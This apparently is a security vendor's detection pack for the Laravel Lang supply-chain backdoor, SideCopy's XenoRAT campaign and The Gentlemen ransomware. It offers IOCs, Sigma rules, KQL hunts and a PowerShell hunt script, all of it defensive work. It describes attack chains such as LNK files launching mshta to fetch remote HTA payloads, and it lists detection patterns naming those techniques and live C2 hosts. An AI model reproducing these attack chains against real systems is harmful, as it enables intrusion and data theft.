Laravel Supply Chain RCE, SideCopy XenoRAT Campaigns, and The Gentlemen RaaS Activity — Enterprise Detection Pack | Security Arsenal

Recent OTX pulses indicate a convergence of high-risk threats spanning supply chain compromises, geo-political espionage, and financially motivated Ransomware-as-a-Service (RaaS).

Supply Chain (Laravel Lang): A coordinated attack on community-maintained Laravel packages (laravel-lang/lang, laravel-lang/attributes, etc.) has introduced RCE backdoors. The adversaries compromised maintainer credentials to publish malicious tags affecting 700+ versions, deploying the helpers.php stealer and DebugChromium.exe.
Espionage (Operation XENOFISCAL): The SideCopy APT (linked to Transparent Tribe/APT36) is actively targeting the Afghanistan Ministry of Finance using Pashto-language spear phishing lures. The attack chain leverages LNK files executing mshta.exe to fetch remote HTA payloads, ultimately deploying the persistent XenoRAT.
Cybercrime (The Gentlemen): Storm-2697's "The Gentlemen" RaaS is gaining traction. Written in Go, it utilizes robust encryption (Curve25519 + XChaCha20) and aggressive self-propagation capabilities to target Education, Transportation, Healthcare, and Finance sectors.

Threat Actor / Malware Profile

Laravel Supply Chain Actors

Malware: helpers.php stealer, DebugChromium.exe.
Distribution: Compromised npm/composer packages (laravel-lang/*).
Behavior: The malicious PHP files act as stealers and downloaders, fetching DebugChromium.exe which likely establishes persistence and exfiltrates data to flipboxstudio.info.

SideCopy (APT36 / Transparent Tribe)

Malware: XenoRAT.
Targeting: Afghan Government (MoF), Finance, Provincial Revenue Directorates.
Distribution: Spear phishing with malicious LNK files disguised as staff directories.
Behavior: Multi-stage loader. LNK triggers mshta.exe -> retrieves HTA from compromised domains (abimj.edu.af) -> drops XenoRAT. XenoRAT provides remote control, C2 communication, and data theft.

Storm-2697 (The Gentlemen)

Malware: The Gentlemen Ransomware, Kazuar.
Targeting: Broad (Education, Transport, Health, Finance).
Behavior: Self-propagating Go binary. Uses advanced cryptography for file encryption. Network propagation suggests SMB or worm-like capabilities to spread across the enterprise.

IOC Analysis

Indicator Types:

Network Infrastructure: C2 domains (flipboxstudio.info), compromised legit infrastructure (abimj.edu.af), and C2 IPs (103.132.98.224).
File Artifacts: SHA256, MD5, and SHA1 hashes for the stealer components, XenoRAT payloads, and The Gentlemen encryptor.

Operational Guidance:

SOC/EDR: Import all hashes into EDR solutions for immediate alerting on execution/attempts. Block the listed domains and IPs at the perimeter and proxy level.
Threat Hunting: Use the specific hashes to hunt for historical presence. Focus on the flipboxstudio.info domain connections in outbound logs to identify potential Laravel-compromise victims. Investigate any mshta.exe processes spawned by LNK files or Office products for SideCopy activity.

Detection Engineering

YAML

---
title: Potential Laravel Lang Backdoor Execution
description: Detects execution of suspicious binaries (DebugChromium.exe) spawned by PHP processes, indicative of the Laravel Lang compromise.
author: Security Arsenal
date: 2026/05/31
references:
  - https://socket.dev/blog/laravel-lang-compromise
tags:
  - attack.execution
  - attack.t1204
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: 
      - '\\php.exe'
      - '\\php-cgi.exe'
    Image|endswith:
      - '\\DebugChromium.exe'
      - '\\powershell.exe'
      - '\\cmd.exe'
  condition: selection
falsepositives:
  - Legitimate developer testing
level: high

---
title: SideCopy APT HTA Payload via Mshta
description: Detects SideCopy activity where mshta.exe executes remote HTA content, often initiated by malicious LNK files.
author: Security Arsenal
date: 2026/05/31
references:
  - https://www.seqrite.com/blog/operation-xenofiscal-sidecopy-deploying-persistent-xenorat-targeting-the-mof-afghanistan/
tags:
  - attack.initial_access
  - attack.t1566.001
  - attack.t1204.002
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\\mshta.exe'
    CommandLine|contains: 'http'
    CommandLine|contains: '.hta'
  filter:
    ParentImage|endswith:
      - '\\explorer.exe' # User clicking directly is rare for remote hta
      - '\\iexplore.exe'
      - '\\chrome.exe'
  condition: selection and not filter
falsepositives:
  - Legitimate administrative scripts
level: critical

---
title: The Gentlemen Ransomware Suspicious Go Process
author: Security Arsenal
date: 2026/05/31
description: Detects potential Go-based ransomware (The Gentlemen) exhibiting mass file modification or suspicious SMB propagation patterns.
references:
  - https://www.microsoft.com/en-us/security/blog/2026/05/28/the-gentlemen-ransomware-dissecting-a-self-propagating-go-encryptor/
tags:
  - attack.impact
  - attack.t1486
logsource:
  category: process_creation
  product: windows
detection:
  selection_go:
    Image|endswith: '.exe'
    Company|contains: 'Go' # Or unsigned but check compilation hints if available via other telemetry
  selection_behavior:
    CommandLine|contains:
      - 'encryption'
      - 'C$'
      - 'ADMIN$'
  condition: all of selection_*
falsepositives:
  - Legitimate Go admin tools
level: medium


kql
// Hunt for SideCopy C2 Domains and IPs
DeviceNetworkEvents
| where RemoteUrl in (\"abimj.edu.af\") or RemoteIP == \"103.132.98.224\"
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort

// Hunt for Laravel Backdoor C2 Domain
DeviceNetworkEvents
| where RemoteUrl has \"flipboxstudio.info\"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl

// Hunt for specific XenoRAT and Gentlemen File Hashes
DeviceProcessEvents
| where SHA256 in (
    \"3b4194bdfe40d94031a94b30397ffd8a4b09d0a4057668e897b8bdcd1703dd01\",
    \"99127c8c67d90e2776beeb85281f9c68399bf4567b07a6b638d68b760212e88d\",
    \"22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67\",
    \"fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68\"
)
| project Timestamp, DeviceName, FileName, SHA256, AccountName


powershell
# IOC Hunt Script for Laravel Backdoor and SideCopy Activity
# Requires Administrative Privileges

Write-Host \"Starting IOC Hunt based on OTX Pulses...\" -ForegroundColor Cyan

$IOC_Hashes = @(
    \"3b4194bdfe40d94031a94b30397ffd8a4b09d0a4057668e897b8bdcd1703dd01\", # XenoRAT
    \"99127c8c67d90e2776beeb85281f9c68399bf4567b07a6b638d68b760212e88d\", # XenoRAT
    \"0b937b7da4602a8aa5346681b13a3466\", # XenoRAT MD5
    \"14ce728a416b1f13e8645f3f7b860a37\", # XenoRAT MD5
    \"22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67\", # The Gentlemen
    \"fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68\", # The Gentlemen
    \"7a262d4cbbc4808922b6af42c4041f06\"  # The Gentlemen MD5
)

$IOC_Domains = @(\"flipboxstudio.info\", \"abimj.edu.af\")

# 1. Check for Malicious File Hashes (C:\ drive scan)
Write-Host \"Scanning for known malicious file hashes...\" -ForegroundColor Yellow
foreach ($hash in $IOC_Hashes) {
    $matches = Get-ChildItem -Path C:\\ -Recurse -ErrorAction SilentlyContinue | 
        Get-FileHash -ErrorAction SilentlyContinue | 
        Where-Object { $_.Hash -eq $hash }
    
    if ($matches) {
        Write-Host \"[ALERT] Malicious file found: \" -NoNewline -ForegroundColor Red
        Write-Host $matches.Path
    }
}

# 2. Check DNS Cache for Malicious Domains
Write-Host \"Checking DNS Cache for C2 Domains...\" -ForegroundColor Yellow
$dnsEntries = Get-DnsClientCache -ErrorAction SilentlyContinue
foreach ($domain in $IOC_Domains) {
    $hit = $dnsEntries | Where-Object { $_.Entry -like \"*$domain*\" }
    if ($hit) {
        Write-Host \"[ALERT] C2 Domain found in DNS Cache: \" -NoNewline -ForegroundColor Red
        Write-Host $domain
    }
}

# 3. Check for suspicious mshta.exe connections (Process Check)
Write-Host \"Checking for mshta.exe processes with network activity...\" -ForegroundColor Yellow
$processes = Get-WmiObject Win32_Process | Where-Object { $_.Name -eq \"mshta.exe\" }
if ($processes) {
    Write-Host \"[WARN] mshta.exe is currently running. Investigate parent process.\" -ForegroundColor DarkYellow
    foreach ($proc in $processes) {
        Write-Host \"PID: $($proc.Handle), Parent PID: $($proc.ParentProcessId), CommandLine: $($proc.CommandLine)\"
    }
}

Write-Host \"Hunt Complete.\" -ForegroundColor Green

Response Priorities

Immediate:
- Block all listed IOCs (flipboxstudio.info, 103.132.98.224, abimj.edu.af) at perimeter firewalls, proxies, and endpoint security gateways.
- Isolate any endpoints triggering alerts for the specific file hashes (XenoRAT, The Gentlemen, DebugChromium.exe).
- Initiate a hunt for mshta.exe spawned by non-standard parent processes (SideCopy).
24 Hours:
- Laravel Incident: Verify the integrity of laravel-lang dependencies in development environments. Force a re-download of packages from known-good sources or pinned to specific pre-compromise versions.
- Credential Audit: If credential-stealing malware (helpers.php) is suspected, force reset of developer credentials and tokens potentially exposed.
1 Week:
- Architecture Hardening: Implement strict package verification and SBOM scanning for CI/CD pipelines to prevent supply chain injection.
- Lateral Movement Restrictions: Review SMB/RPC permissions to hinder the self-propagation capabilities of threats like The Gentlemen.
- Phishing Awareness: Update security awareness training to include specific lures related to Pashto-language documents or financial-themed attachments targeting relevant departments.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

Laravel Supply Chain RCE, SideCopy XenoRAT Campaigns, and The Gentlemen RaaS Activity — Enterprise Detection Pack